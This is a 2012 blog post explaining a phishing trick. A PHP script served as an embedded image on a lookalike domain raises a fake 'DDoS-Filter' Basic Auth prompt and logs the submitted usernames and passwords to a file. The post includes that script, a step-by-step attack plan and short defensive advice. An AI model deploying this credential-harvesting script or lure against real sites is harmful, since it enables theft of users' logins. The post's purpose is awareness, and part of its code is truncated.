Wicked phishing pictures

It would be true to say that everything new is well forgotten old.

A feature to embed remote resources (such as images from other websites) on the page of your website is a very bad practice that at some point may lead to quite serious consequences for the website. As far back as 10 years ago, I was surprised to read about that possibility. Now after 10 years nothing changed, and it seems that it hardly ever will change.

Theory and practice

1. Hacker is a bad user that registers a domain similar in spelling to the target domain.
2. Hacker loads up the PHP script into it with the content.

if (!isset($_SERVER['PHP_AUTH_USER'])) {
$vulnsite = parse_url($_SERVER['REFERER']);
//header('Content-Type: text/html; charset=windows-1251');
//header('WWW-Authenticate: Basic realm="'.ucfirst($vulnsite['host']).' DDoS-Filter: Enter your Login and Password"');
//header('HTTP/1.0 401 Unauthorized');
} else {
$f = fopen('passes.txt', 'a');
fwrite($f, $_SERVER['PHP_AUTH_USER'].';'.$_SERVER['PHP_AUTH_PW']."\r\n");
header("Content-type: image/jpeg");
$image = imagecreatefromjpeg('image.jpg');

// Accordingly, in the same folder is normal image.jpg
// Here you can play with the script extension and name it as superphoto.jpg.
3. User writes an article and embeds the picture in the post:

img src="" alt="image"/>
4. If there is moderation on the site, then an article is sent for moderation.
5. For example, an article turned out good, so it gets on a homepage.
6. Hacker sees his creation on the homepage and removes comments from PHP code, so in response to pictures request from the post, any user will get a window with the authorization in the browser, where can be written in anything, for instance that the site fights off the DDoS attack and could request to re-enter login and password.
7. User does not grasp the meaning of the domain name in the form of authorization and submits username and password.
8. Hacker gets your username and password.

Protection methods

I think there are two methods:

• At the browser level: To bar the authorization window from another website.
• At the level of site developers: To copy all remote resources to the hosting.

P.S. is no exception, because it has the posts with the pictures from other sites on its homepage. So just keep in mind this trick, and always check the domain name that requires the authorization.

There is always a potential risk that while the image is on the homepage, the website that this picture is linked can be broken only for replacing the image for the script.


I do not think that this is a bug.
This is nothing more than a trick, which is officially allowed protocols HTTP.
ZimerMan 30 april 2012, 8:28
Vote for this post
Bring it to the Main Page


Leave a Reply

Avaible tags
  • <b>...</b>highlighting important text on the page in bold
  • <i>..</i>highlighting important text on the page in italic
  • <u>...</u>allocated with tag <u> text shownas underlined
  • <s>...</s>allocated with tag <s> text shown as strikethrough
  • <sup>...</sup>, <sub>...</sub>text in the tag <sup> appears as a superscript, <sub> - subscript
  • <blockquote>...</blockquote>For  highlight citation, use the tag <blockquote>
  • <code lang="lang">...</code>highlighting the program code (supported by bash, cpp, cs, css, xml, html, java, javascript, lisp, lua, php, perl, python, ruby, sql, scala, text)
  • <a href="http://...">...</a>link, specify the desired Internet address in the href attribute
  • <img src="http://..." alt="text" />specify the full path of image in the src attribute